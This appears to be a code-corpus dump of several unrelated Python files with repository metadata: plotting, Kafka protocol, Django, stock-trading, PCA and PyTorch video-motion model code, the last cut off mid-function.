# "axes.titlesize": 80,
# "axes.labelsize": 50})
# Set up Seaborn style
sns.set(style="darkgrid")
# Import the dataframe
dataframe = pd.read_csv(data_filename)
dataframe = dataframe.loc[dataframe['vertices'].isin([10, 14, 18,
22, 26, 30])]
dataframe['algorithm'] =\
np.vectorize(algorithm_font)(dataframe['algorithm'])
if verbose:
print(dataframe)
# Compute the plot
facet_kws = dict()
warnings.simplefilter(action='ignore', category=FutureWarning)
plot = sns.factorplot(data=dataframe,
row="regularity",
x="vertices",
y="tree-decomp-time",
hue="algorithm",
palette=[colors[x] for x in ['freetdi',
'meiji',
'quickbb']],
facet_kws=facet_kws,
kind="strip",
dodge=True,
jitter=True,
alpha=0.7,
linewidth=0.1,
aspect=1.7,
size=2.5,
hue_order=['\\textsf{freetdi}',
'\\textsf{meiji-e}',
'\\textsf{quickbb}'],
legend=False)
# Manually add dashed lines to facets
for axis in plot.fig.get_axes():
for i in range(len(dataframe["vertices"]) - 1):
axis.axvline(x=i+.5, c="white", dashes=(2, 1))
axis.axhline(y=900, c='black', dashes=(3, 3))
# Set axis lengths and format
plot.set(ylim=(.0001, 100000000), yscale='log')
# Set axis labels
plot.fig.get_axes()[-1].set(xlabel="Vertices")
for axis in plot.fig.get_axes():
axis.set(ylabel="Run Time (sec)")
# Set axis labels
plot.set_titles(row_template="{row_name}-Regular")
# Add legend
plot.fig.get_axes()[0].legend(loc="upper left")
# Save figure
for extension in ['.pdf', '.png']:
plot.savefig(plot_filename + extension)
if __name__ == '__main__':
data_filename = sys.argv[1]
plot_filename = sys.argv[2]
plot_treewidth_time_comparison(data_filename, plot_filename, False)
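# A hedged invocation sketch (the file names are assumptions): the script takes
# the input CSV and the output plot basename as positional arguments, e.g.
#   python qaoa_treewidth_times.py treewidth_times.csv treewidth_times_plot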
|
[
"tdgoodrich@gmail.com"
] |
tdgoodrich@gmail.com
|
27f63b70abc0cd6f6297ee7e2b96aaee13373a40
|
1c64fb8357978cc30d027c542e5d3c26d6c1598e
|
/esque_wire/protocol/structs/api/end_txn_request.py
|
ef140186f30cd934affbf288eabc215ef0a65a52
|
[
"MIT"
] |
permissive
|
real-digital/esque-wire
|
d3c218896f8ef2300737d6c1ff161b6786418732
|
eb02c49f38b89ad5e5d25aad15fb4ad795e52807
|
refs/heads/master
| 2022-11-28T20:09:10.617618
| 2021-03-15T14:27:47
| 2021-03-15T14:27:47
| 210,586,766
| 0
| 1
|
MIT
| 2022-11-16T00:40:52
| 2019-09-24T11:33:00
|
Python
|
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
from typing import ClassVar
from ...constants import ApiKey
from ..base import RequestData
class EndTxnRequestData(RequestData):
transactional_id: str
producer_id: int
producer_epoch: int
transaction_result: bool
api_key: ClassVar[ApiKey] = ApiKey.END_TXN
def __init__(self, transactional_id: str, producer_id: int, producer_epoch: int, transaction_result: bool):
"""
:param transactional_id: The transactional id corresponding to the transaction.
:type transactional_id: str
:param producer_id: Current producer id in use by the transactional id.
:type producer_id: int
:param producer_epoch: Current epoch associated with the producer id.
:type producer_epoch: int
:param transaction_result: The result of the transaction (0 = ABORT, 1 = COMMIT)
:type transaction_result: bool
"""
self.transactional_id = transactional_id
self.producer_id = producer_id
self.producer_epoch = producer_epoch
self.transaction_result = transaction_result
|
[
"noreply@github.com"
] |
real-digital.noreply@github.com
|
67d94141c63d139b3792ef29634a792447a3a5f2
|
aef4f1ef9ee0a62c80be7445accda56ff5e8ad63
|
/bookstore/comments/urls.py
|
0a530be2feb88fef400cb4ce204dde90ad2dd2f4
|
[] |
no_license
|
wangxumumu/project
|
069e4786b6b243e2c1376b8c4ff557d8dd21f2b8
|
8cd13355ad3241a372f43d495214b02282cf3b32
|
refs/heads/master
| 2021-05-05T00:22:17.420618
| 2018-04-07T05:46:14
| 2018-04-07T05:46:14
| 119,490,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
from django.conf.urls import url
from comments import views
urlpatterns = [
    # For parameterized routes like this, the view function takes arguments; add one capture group here for each argument the view expects
    url(r'^comment/(?P<books_id>\d+)/$',views.comment,name='comment'), # comment content
]
|
[
"978116554@qq.com"
] |
978116554@qq.com
|
9a9f1c472855fe98af3c0077eae971eedd712e96
|
5b5fcd6a1f0084a4345ae82061bd1b4710a797fd
|
/curso python/catalogo/catalogo/apps/webservices/ws_productos/views.py
|
3d40f65c4186333fed5b74475e6947cb75e7e1de
|
[] |
no_license
|
AlejandraCruz/cursopython
|
abbb4b414624813cfd4dcc63a9a205dc0a795ec4
|
3aa3a0445b68af0c264c7e9f7f1b152d2fdc0805
|
refs/heads/master
| 2016-09-13T07:22:34.404194
| 2016-05-10T10:57:03
| 2016-05-10T10:57:03
| 58,498,463
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 795
|
py
|
# Create your views here.
from django.http import HttpResponse
from catalogo.apps.ventas.models import *
from django.core import serializers
def ws_productos_view(request):
data = serializers.serialize("json",Producto.objects.filter(status = True))
return HttpResponse(data, mimetype='application/json')
from .serializer import producto_serializer, marca_serializer, categoria_serializer
from rest_framework import viewsets
class producto_viewset(viewsets.ModelViewSet):
queryset = Producto.objects.all()
serializer_class = producto_serializer
class marca_viewset(viewsets.ModelViewSet):
queryset = Marca.objects.all()
serializer_class = marca_serializer
class categoria_viewset(viewsets.ModelViewSet):
queryset = Categoria.objects.all()
serializer_class = categoria_serializer
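# A hedged sketch of how these viewsets are typically exposed through a DRF
# DefaultRouter (normally this lives in a urls.py rather than here); the URL
# prefixes 'productos', 'marcas' and 'categorias' are assumptions.
from rest_framework import routers
router = routers.DefaultRouter()
router.register(r'productos', producto_viewset)
router.register(r'marcas', marca_viewset)
router.register(r'categorias', categoria_viewset)
urlpatterns = router.urls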
|
[
"yacruz67@misena.edu.co"
] |
yacruz67@misena.edu.co
|
ad5be25309598ccb4ebf24e6860b2ff7407b3f6d
|
30a287ec53c4eb3f72e7a5882000cb6b7a8f9a91
|
/Legendarios-web/registros/models.py
|
7e07d80b69cb3401ab5b21144c5e4b246f78042c
|
[] |
no_license
|
asapper/registro-legendarios
|
a3affc941d0f5e9044647fe28b54724d2e390a8c
|
69b8e09f34d10dfe929d964669757a33b501bd69
|
refs/heads/master
| 2021-01-21T15:53:40.576625
| 2017-08-04T20:00:12
| 2017-08-04T20:00:12
| 95,399,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,270
|
py
|
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
class Legado(models.Model):
OPCIONES_LEGADO = (
('Osos', 'Osos'),
('Jaguares', 'Jaguares'),
('Águilas', 'Águilas'),
)
nombre = models.CharField(max_length=50)
apellido = models.CharField(max_length=50)
fecha_de_nacimiento = models.DateField()
tipo = models.CharField(max_length=50, choices=OPCIONES_LEGADO)
def __str__(self):
return "{} {}".format(self.nombre, self.apellido)
class Miembro(models.Model):
OPCIONES_ESTATUS = (
('activo', 'Activo'),
('inactivo', 'Inactivo'),
)
    # reference to the login credentials
    user = models.OneToOneField(User)
    # member data
nombre = models.CharField(max_length=50)
apellido = models.CharField(max_length=50)
fecha_de_nacimiento = models.DateField(null=True) # not required upon registration
correo = models.EmailField(unique=True)
telefono = models.CharField(max_length=25, default="")
foto = models.ImageField(upload_to="miembros/", null=True, blank=True)
tipo_de_sangre = models.CharField(max_length=25, default="")
estado_civil = models.CharField(max_length=50, default="")
pais = models.CharField(max_length=100, default="")
congregacion = models.CharField(max_length=100, default="")
numero_de_legendario = models.PositiveIntegerField(unique=True)
testimonio = models.TextField(default="")
estatus = models.CharField(max_length=25, choices=OPCIONES_ESTATUS, default='activo')
# links for social networks
facebook_link = models.URLField(default="", blank=True)
instagram_link = models.URLField(default="", blank=True)
twitter_link = models.URLField(default="", blank=True)
def __str__(self):
return "{} {}".format(self.nombre, self.apellido)
class Evento(models.Model):
OPCIONES_TIPO = (
('REC', 'REC'),
('RAC', 'RAC'),
('RIO', 'RIO'),
('Legado', 'Legado'),
)
nombre = models.CharField(unique=True, max_length=254)
descripcion = models.TextField()
tipo = models.CharField(max_length=50, choices=OPCIONES_TIPO)
fecha = models.DateField()
pais = models.CharField(max_length=100)
localidad = models.CharField(max_length=100)
badge = models.ImageField(upload_to="eventos/")
miembros = models.ManyToManyField(Miembro, through='Participacion')
def __str__(self):
return self.nombre
class Participacion(models.Model):
OPCIONES_ROL = (
('Participante', 'Participante'),
('Coordinación', 'Coordinación'),
('Sub Coordinación', 'Sub Coordinación'),
('Administración', 'Administración'),
('Jefe de Tribu', 'Jefe de Tribu'),
('Voz', 'Voz'),
('Logística', 'Logística'),
('Evento', 'Evento'),
('Seguridad', 'Seguridad'),
('Apoyo', 'Apoyo'),
)
miembro = models.ForeignKey(Miembro)
evento = models.ForeignKey(Evento)
rol = models.CharField(max_length=50, choices=OPCIONES_ROL)
descripcion = models.TextField()
class Meta:
verbose_name_plural = 'Participaciones'
def __str__(self):
return "{} - {}".format(self.miembro, self.evento)
|
[
"asapper@hotmail.com"
] |
asapper@hotmail.com
|
38b35d907e3cb5df8b3ff6681ee2767e98485de2
|
23aeb04d1092ed6238f65ab53b5afd79e94ed5ec
|
/utility.py
|
903872febddf569b569d321f172381f638ac3fee
|
[] |
no_license
|
DixitNitin/Stock_prediction
|
df8bb569efc72a03347d9d498cae83222d7ee639
|
898e0002a15cad68fc8c90375317f0f5e3ba7f46
|
refs/heads/master
| 2020-06-21T20:17:54.640708
| 2019-07-24T08:40:53
| 2019-07-24T08:40:53
| 197,544,100
| 0
| 2
| null | 2019-07-23T12:15:33
| 2019-07-18T08:19:56
|
Python
|
UTF-8
|
Python
| false
| false
| 2,953
|
py
|
import pandas as pd
import datetime
from decimal import *
def daterange(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
        yield start_date + datetime.timedelta(n)
# input data : id, time, symbol, open, high, low, close
# output data: id, week, symbol, open, high, low, close
def convertToWeekly(data):
weekly = []
last_week = -1
for i, row in data.iterrows():
curr_week = GetWeek(row["timestamp"])
if(curr_week != last_week):
this_Week = row
this_Week["timestamp"] = curr_week
if(last_week != -1):
weekly.append(this_Week)
last_week = curr_week
else:
if(Decimal(row["high"]) > this_Week["high"]):
this_Week["high"] = Decimal(row["high"])
if(Decimal(row["low"]) < Decimal(this_Week["low"])):
this_Week["low"] = Decimal(row["low"])
this_Week["close"] = Decimal(row["close"])
return pd.DataFrame(weekly)
# input data : id, time, symbol, open, high, low, close
# output : time : median
def CalculateMedian(data):
median = []
for i, row in data.iterrows():
med = Decimal(Decimal(row["open"]) + Decimal(row["close"])) / 2
median.append([row["timestamp"], med])
return pd.DataFrame(median, columns = ['timestamp','median'])
def GetWeek(date):
return Decimal(date.isocalendar()[0] * 100) + date.isocalendar()[1]
#trade : symbol, date, price, Buy/Sell
def Calculateprofit(trades):
volume = 1
isbuy = False
buyprice = 0.0
sellprice = 0.0
buydate = datetime.date(2010,1,1)
selldate = datetime.date(2010,1,1)
profit = 0.0
tradecount = 0
tradedays = 0.0
for i, val in trades.iterrows():
if(val['trade'] == 'BUY'):
if (isbuy):
print ("BUY and isbuy true", val)
buyprice = ((volume * buyprice) + val['price'] )/ (volume + 1)
buydate += (val['timestamp'] - buydate) / (volume + 1)
volume += 1
else:
print ("BUY and isbuy false", val)
profit = Decimal(profit) + (Decimal((Decimal(sellprice) - Decimal(val['price'])) * Decimal(volume)))
tradedays = Decimal(tradedays) + (Decimal((val['timestamp'] - selldate).days) * Decimal(volume))
tradecount += volume
buyprice = val['price']
buydate = val['timestamp']
volume = 1
isbuy = True
if(val['trade'] == 'SELL'):
if (isbuy):
profit = Decimal(profit) + (Decimal((Decimal(val['price']) - Decimal(buyprice)) * Decimal(volume)))
tradedays = Decimal(tradedays) + (Decimal((val['timestamp'] - buydate).days) * Decimal(volume))
tradecount += volume
sellprice = val['price']
selldate = val['timestamp']
volume = 1
isbuy = False
print ("SELL and isbuy true", val, profit, tradedays)
if(tradecount > 0):
print ('profit per trade : ' , profit/tradecount)
print ('Days per trade : ' , tradedays/tradecount)
print ('profit per trade per day : ' , (profit/tradecount)/(tradedays/tradecount))
print ('No of trade : ' , tradecount)
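# A small usage sketch for CalculateMedian above, using a toy OHLC frame
# (the numbers are arbitrary); each median is (open + close) / 2 per row.
if __name__ == '__main__':
    toy = pd.DataFrame({
        'timestamp': pd.date_range('2019-01-01', periods=3, freq='D'),
        'open': [10.0, 11.0, 12.0],
        'high': [12.0, 13.0, 14.0],
        'low': [9.0, 10.0, 11.0],
        'close': [11.0, 12.0, 13.0],
    })
    print(CalculateMedian(toy))      # columns: timestamp, median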
|
[
"noreply@github.com"
] |
DixitNitin.noreply@github.com
|
eb6a637ea84d36e185a6db53af40a0ca7dbf62de
|
4a11712cbae24052121fc87279a0a7201bbc4388
|
/Unsupervised Learning/Experiment 2/PCA/cancer_PCA.py
|
30ec6fd032b3ccb8c7bc67b5feb7fbaf11310d78
|
[] |
no_license
|
Timbabs/Machine-Learning
|
3c66fef4a0f8ff5252a8911d06e3e3c6bd7c05d9
|
8cb2d55b546cb1a77da247a179f3b1e8817b078a
|
refs/heads/master
| 2021-05-09T16:35:37.186775
| 2018-01-27T01:18:38
| 2018-01-27T01:18:38
| 109,227,455
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,792
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
import numpy as np
import pylab
from mpl_toolkits.mplot3d import Axes3D
from mpl_toolkits.mplot3d import proj3d
from mpl_toolkits.mplot3d import Axes3D
feature_cols_label = ['worst_perimeter', 'mean_concativity', 'mean_area', 'label']
wisconsin = pd.read_csv('../../utils/data.csv', names=feature_cols_label)
array = wisconsin[feature_cols_label].values
X = array[:,0:3]
scaler = StandardScaler()
X = scaler.fit_transform(X)
y = array[:,3]
# -----------------------------------------------------------------------------------------------------------------
pca = PCA(n_components=2)
fit = pca.fit(X)
# fig1 = plt.figure(1)
# ax = Axes3D(fig1)
# #
# ax.scatter(X[:, 0], X[:, 2], X[:, 1], alpha=0.2)
#
# x22, y22, _ = proj3d.proj_transform((pca.mean_)[0], (pca.mean_)[2], (pca.mean_)[1], ax.get_proj())
# v0 = (x22, y22)
#
# def draw_vector(v):
# arrowprops=dict(arrowstyle='->', linewidth=2, shrinkA=0, shrinkB=0)
# pylab.annotate('', xy = v, xytext=v0, arrowprops = arrowprops)
#
# for length, vector in zip(pca.explained_variance_, pca.components_):
# v = vector * 3 * np.sqrt(length)
# x2, y2, _ = proj3d.proj_transform((pca.mean_ + v)[0], (pca.mean_ + v)[2], (pca.mean_ + v)[1], ax.get_proj())
# v = (x2, y2)
# draw_vector(v)
#
# ax.set_xlabel('worst_perimeter')
# ax.set_ylabel('mean_area')
# ax.set_zlabel('mean_concativity')
# ax.set_title('input features')
# plt.savefig('inputProjCancer.png', dpi=300)
# pylab.show()
# def draw_vector(v0, v1, ax=None):
# ax = ax or plt.gca()
# arrowprops = dict(arrowstyle='->',
# linewidth=2,
# shrinkA=0, shrinkB=0)
# ax.annotate('', v1, v0, arrowprops=arrowprops)
#
# # plot data
#
# fig = plt.figure(2)
# X = pca.transform(X)
# pca.fit(X)
#
#
# plt.scatter(X[:, 0], X[:, 1], alpha=0.2)
# for length, vector in zip(pca.explained_variance_, pca.components_):
# v = vector * 3 * np.sqrt(length)
# draw_vector(pca.mean_, pca.mean_ + v)
#
# plt.xlabel('component 1')
# plt.ylabel('component 2')
# plt.title('principal components')
# plt.savefig('principalProjCancer.png', dpi=300)
# plt.show()
#
# # #
# fig1 = plt.figure(1)
# ax = Axes3D(fig1)
#
# X_pca = pca.transform(X)
#
# # df = pd.DataFrame(X_pca)
# # df.to_csv('pca_cancer_reduced.csv', index=0, header=0)
#
# X_new = pca.inverse_transform(X_pca)
#
# ax.scatter(X[:, 2], X[:, 1], X[:, 0], alpha=0.2, label='original data (3 features)')
# ax.scatter(X_new[:, 2], X_new[:, 1], X[:, 0], alpha=0.8, label='projected data (2 components)')
# ax.legend(loc='best')
#
# #plt.savefig('comboProjCancer.png', dpi=300)
# pylab.show()
# projected = pca.transform(X)
# plt.scatter(projected[:, 0], projected[:, 1],
# c=y, edgecolor='none', alpha=0.5,
# cmap=plt.cm.get_cmap('spectral', 10))
# plt.xlabel('component 1')
# plt.ylabel('component 2')
# plt.colorbar()
# plt.savefig('3_PCACancer.png', dpi=300)
# plt.show()
# -----------------------------------------------------------------------------------------------------------------
# -----------------------------------------------------------------------------------------------------------------
cov_mat = np.corrcoef(X.T)
eig_vals, eig_vecs = np.linalg.eig(cov_mat)
print(eig_vals)
#
# tot = sum(eig_vals)
# var_exp = [(i / tot) for i in sorted(eig_vals, reverse=True)]
# cum_var_exp = np.cumsum(var_exp)
#
# plt.bar(range(1, 4), var_exp, alpha=0.5, align='center', label='individual explained variance')
# plt.step(range(1, 4), cum_var_exp, where='mid', label='cumulative explained variance')
# plt.ylabel('Explained variance ratio')
# plt.xlabel('Principal components')
# plt.legend(loc='best')
# plt.savefig('k_cancerPCA.png')
# plt.show()
# -----------------------------------------------------------------------------------------------------------------
#
# fig2 = plt.figure(2)
# ax = Axes3D(fig2)
#
# LABEL_COLOR_MAP = {0: 'g',
# 1: 'r'
# }
# #
# label_color = [LABEL_COLOR_MAP[l] for l in y]
#
# ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=label_color)
# #
# #
# import matplotlib
#
# scatter1_proxy = matplotlib.lines.Line2D([0], [0], linestyle="none", c=LABEL_COLOR_MAP[0], marker='o')
# scatter2_proxy = matplotlib.lines.Line2D([0], [0], linestyle="none", c=LABEL_COLOR_MAP[1], marker='o')
# ax.legend([scatter1_proxy, scatter2_proxy], ['diabetes negative', 'diabetes positive'], numpoints=2)
#
#
# ax.set_xlabel('principal component 1')
# ax.set_ylabel('principal component 2')
# ax.set_zlabel('principal component 3')
# ax.set_title('3 Principal components Analysis')
#
#
# fig2.savefig('3_PCA.png', dpi=300)
#
#
# plt.show()
#
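# A short hedged follow-up: the PCA fitted above with n_components=2 also
# exposes the fraction of total variance captured by each retained component.
print(fit.explained_variance_ratio_)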
|
[
"timothyybaba@gmail.com"
] |
timothyybaba@gmail.com
|
936a7f5e2ce3a10d6bee07b1add9629e34d6c785
|
f6641c552622e1446d913d50f561ff14c524e885
|
/models/models_old6.py
|
4c2d0c04149ca4a51df23468554ac0b227271ea2
|
[] |
no_license
|
yangyi02/video_motion_synthetic3
|
939d1ddd3a4caada87e0e2ef3ed430dae9b2447e
|
e732d3641c555422b977648211683cb21186bcdb
|
refs/heads/master
| 2021-01-01T06:46:55.553125
| 2017-08-04T00:19:28
| 2017-08-04T00:19:28
| 97,509,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,084
|
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torch.nn.functional as F
import math
class Net(nn.Module):
def __init__(self, im_height, im_width, im_channel, n_inputs, n_class, m_range, m_kernel):
super(Net, self).__init__()
num_hidden = 64
self.conv0 = nn.Conv2d(n_inputs*im_channel, num_hidden, 3, 1, 1)
self.bn0 = nn.BatchNorm2d(num_hidden)
self.conv1 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(num_hidden)
self.conv2 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(num_hidden)
self.conv3 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn3 = nn.BatchNorm2d(num_hidden)
self.conv4 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn4 = nn.BatchNorm2d(num_hidden)
self.conv5 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn5 = nn.BatchNorm2d(num_hidden)
self.conv6 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn6 = nn.BatchNorm2d(num_hidden)
self.conv7 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn7 = nn.BatchNorm2d(num_hidden)
self.conv8 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn8 = nn.BatchNorm2d(num_hidden)
self.conv9 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn9 = nn.BatchNorm2d(num_hidden)
self.conv10 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn10 = nn.BatchNorm2d(num_hidden)
self.conv11 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn11 = nn.BatchNorm2d(num_hidden)
self.conv_x = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.conv_y = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
num_hidden2 = 64
self.conv_s0 = nn.Conv2d(im_channel, num_hidden2, 3, 1, 1)
self.bn_s0 = nn.BatchNorm2d(num_hidden2)
self.conv_s1 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s1 = nn.BatchNorm2d(num_hidden2)
self.conv_s2 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s2 = nn.BatchNorm2d(num_hidden2)
self.conv_s3 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s3 = nn.BatchNorm2d(num_hidden2)
self.conv_s4 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s4 = nn.BatchNorm2d(num_hidden2)
self.conv_s5 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s5 = nn.BatchNorm2d(num_hidden2)
self.conv_s6 = nn.Conv2d(num_hidden2, num_hidden2, 3, 1, 1)
self.bn_s6 = nn.BatchNorm2d(num_hidden2)
self.conv_s7 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s7 = nn.BatchNorm2d(num_hidden2)
self.conv_s8 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s8 = nn.BatchNorm2d(num_hidden2)
self.conv_s9 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s9 = nn.BatchNorm2d(num_hidden2)
self.conv_s10 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s10 = nn.BatchNorm2d(num_hidden2)
self.conv_s11 = nn.Conv2d(num_hidden2*2, num_hidden2, 3, 1, 1)
self.bn_s11 = nn.BatchNorm2d(num_hidden2)
self.conv_s = nn.Conv2d(num_hidden2, 1, 3, 1, 1)
self.maxpool = nn.MaxPool2d(2, stride=2, return_indices=False, ceil_mode=False)
self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)
self.im_height = im_height
self.im_width = im_width
self.im_channel = im_channel
self.n_inputs = n_inputs
self.n_class = n_class
self.m_range = m_range
self.m_kernel = m_kernel
def forward(self, im_input):
x = self.bn0(self.conv0(im_input))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn7(self.conv7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn8(self.conv8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn9(self.conv9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn10(self.conv10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn11(self.conv11(x11)))
motion_x = self.conv_x(x11)
motion_y = self.conv_y(x11)
m_mask_x = F.softmax(motion_x)
m_mask_y = F.softmax(motion_y)
m_mask_x = m_mask_x.unsqueeze(1).expand(m_mask_x.size(0), m_mask_x.size(1), m_mask_x.size(1), m_mask_x.size(2), m_mask_x.size(3)).contiguous()
m_mask_x = m_mask_x.view(m_mask_x.size(0), -1, m_mask_x.size(3), m_mask_x.size(4))
m_mask_y = m_mask_y.unsqueeze(2).expand(m_mask_y.size(0), m_mask_y.size(1), m_mask_y.size(1), m_mask_y.size(2), m_mask_y.size(3)).contiguous()
m_mask_y = m_mask_y.view(m_mask_y.size(0), -1, m_mask_y.size(3), m_mask_y.size(4))
m_mask = m_mask_x * m_mask_y
x = self.bn_s0(self.conv_s0(im_input[:, -self.im_channel:, :, :]))
x1 = F.relu(self.bn_s1(self.conv_s1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn_s2(self.conv_s2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn_s3(self.conv_s3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn_s4(self.conv_s4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn_s5(self.conv_s5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn_s6(self.conv_s6(x6)))
x6 = self.upsample(x6)
x7 = torch.cat((x6, x5), 1)
x7 = F.relu(self.bn_s7(self.conv_s7(x7)))
x7 = self.upsample(x7)
x8 = torch.cat((x7, x4), 1)
x8 = F.relu(self.bn_s8(self.conv_s8(x8)))
x8 = self.upsample(x8)
x9 = torch.cat((x8, x3), 1)
x9 = F.relu(self.bn_s9(self.conv_s9(x9)))
x9 = self.upsample(x9)
x10 = torch.cat((x9, x2), 1)
x10 = F.relu(self.bn_s10(self.conv_s10(x10)))
x10 = self.upsample(x10)
x11 = torch.cat((x10, x1), 1)
x11 = F.relu(self.bn_s11(self.conv_s11(x11)))
seg = self.conv_s(x11)
seg = F.sigmoid(seg)
# seg = construct_seg(seg, m_mask, self.m_kernel, self.m_range)
# disappear = F.relu(seg - 1)
# appear = F.relu(1 - disappear)
pred = construct_image(im_input[:, -self.im_channel:, :, :], m_mask, seg, self.m_kernel, self.m_range)
return pred, m_mask, seg
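# Illustrative sketch (not part of the original file): conv_x and conv_y above each
# predict K = sqrt(n_class) logits per pixel, and the unsqueeze/expand/view steps form
# the outer product of the two per-axis softmax distributions, yielding a K*K joint
# mask over all (dx, dy) offsets. A minimal standalone check of that identity,
# assuming a reasonably recent PyTorch (tensor names here are hypothetical):
#
# import torch
# B, K, H, W = 1, 3, 2, 2
# px = torch.softmax(torch.randn(B, K, H, W), dim=1)  # distribution over x-offsets
# py = torch.softmax(torch.randn(B, K, H, W), dim=1)  # distribution over y-offsets
# joint = (px.unsqueeze(1) * py.unsqueeze(2)).view(B, K * K, H, W)
# assert torch.allclose(joint.sum(dim=1), torch.ones(B, H, W))  # still a distribution per pixel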
class BiNet(nn.Module):
def __init__(self, im_height, im_width, im_channel, n_inputs, n_class, m_range, m_kernel):
super(BiNet, self).__init__()
num_hidden = 64
self.conv0 = nn.Conv2d(n_inputs*im_channel, num_hidden, 3, 1, 1)
self.bn0 = nn.BatchNorm2d(num_hidden)
self.conv1 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn1 = nn.BatchNorm2d(num_hidden)
self.conv2 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn2 = nn.BatchNorm2d(num_hidden)
self.conv3 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn3 = nn.BatchNorm2d(num_hidden)
self.conv4 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn4 = nn.BatchNorm2d(num_hidden)
self.conv5 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn5 = nn.BatchNorm2d(num_hidden)
self.conv6 = nn.Conv2d(num_hidden, num_hidden, 3, 1, 1)
self.bn6 = nn.BatchNorm2d(num_hidden)
self.conv7 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn7 = nn.BatchNorm2d(num_hidden)
self.conv8 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn8 = nn.BatchNorm2d(num_hidden)
self.conv9 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn9 = nn.BatchNorm2d(num_hidden)
self.conv10 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn10 = nn.BatchNorm2d(num_hidden)
self.conv11 = nn.Conv2d(num_hidden*2, num_hidden, 3, 1, 1)
self.bn11 = nn.BatchNorm2d(num_hidden)
self.conv_x = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.conv_y = nn.Conv2d(num_hidden, int(math.sqrt(n_class)), 3, 1, 1)
self.maxpool = nn.MaxPool2d(2, stride=2, return_indices=False, ceil_mode=False)
self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)
self.im_height = im_height
self.im_width = im_width
self.im_channel = im_channel
self.n_inputs = n_inputs
self.n_class = n_class
self.m_range = m_range
self.m_kernel = m_kernel
def forward(self, im_input_f, im_input_b):
x = self.bn0(self.conv0(im_input_f))
x1 = F.relu(self.bn1(self.conv1(x)))
x2 = self.maxpool(x1)
x2 = F.relu(self.bn2(self.conv2(x2)))
x3 = self.maxpool(x2)
x3 = F.relu(self.bn3(self.conv3(x3)))
x4 = self.maxpool(x3)
x4 = F.relu(self.bn4(self.conv4(x4)))
x5 = self.maxpool(x4)
x5 = F.relu(self.bn5(self.conv5(x5)))
x6 = self.maxpool(x5)
x6 = F.relu(self.bn6(self.conv6(x6)))
x6 = self.upsample(x6)
